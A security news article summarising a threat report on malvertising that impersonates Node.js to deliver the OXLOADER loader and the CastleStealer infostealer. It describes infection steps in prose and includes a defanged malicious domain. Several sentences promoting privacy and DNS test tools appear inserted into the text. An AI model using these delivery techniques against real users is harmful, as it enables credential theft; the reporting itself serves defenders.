OXLOADER Malware Uses Google Ads to Spread CastleStealer Infostealer

Elastic Security Labs has uncovered a new campaign, tracked as REF8372, that delivers the CastleStealer information-stealing malware through a previously undocumented loader called OXLOADER. The operation leverages malicious Google Ads as the initial attack vector, targeting users searching for terms such as "lts version of node.js." Clicking on these sponsored results redirects victims to a fraudulent website hosted at node-js[.]prentiva99[.]info, which impersonates the legitimate Node.js project. The ads were published under the verified advertiser name "ВОЛОДИМИР ТЕРЕЩЕНКО," purportedly a Ukraine-based entity, though it remains unclear whether the account was hijacked, purchased, or freshly created. Google removed the advertiser account and its associated campaigns on May 14, 2026. Security researchers can investigate the rogue domain's registration history using a WHOIS lookup to trace ownership patterns common in similar fraud operations.

OXLOADER demonstrates a high level of engineering sophistication, employing multiple layers of obfuscation including control-flow flattening, opaque predicates, and mixed Boolean-Arithmetic techniques, alongside self-modifying decryption stubs that abuse the Windows .reloc section to stage shellcode. The infection chain begins with a batch script hosted on Storj, a decentralized cloud storage platform that the threat actor abuses to bypass domain-based reputation filters. Execution triggers a fake installation wizard UI while a PowerShell command silently retrieves the OXLOADER executable from Storj and runs it with -Verb RunAs to bypass User Account Control. The loader then uses DLL side-loading to launch a rogue DLL that decrypts and injects the CastleStealer payload. Defenders and researchers can validate outbound traffic anomalies with a DNS leak test to identify unauthorized connections to Storj or other suspicious infrastructure during incident triage.

CastleStealer is a .NET-based stealer previously observed alongside CastleLoader in the BackgroundFix campaign, which used ClickFix-style lures disguised as a free image-editing tool. That earlier activity was attributed to the threat cluster GrayBravo, and analysts are now assessing potential overlap with REF8372. OXLOADER also incorporates anti-VM checks and benign-looking code padding to evade sandbox analysis, contributing to a low detection rate across major antivirus engines. The threat actor appears to be Russian-speaking and financially motivated, evidenced by built-in geographic exclusions that block infections across Commonwealth of Independent States countries. "OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic Security Labs researchers Daniel Stepanic and Jia Yu Chan noted. Users concerned about exposure to similar malvertising campaigns can assess their browser's tracking surface with a browser fingerprint test and review overall exposure through a comprehensive privacy checkup.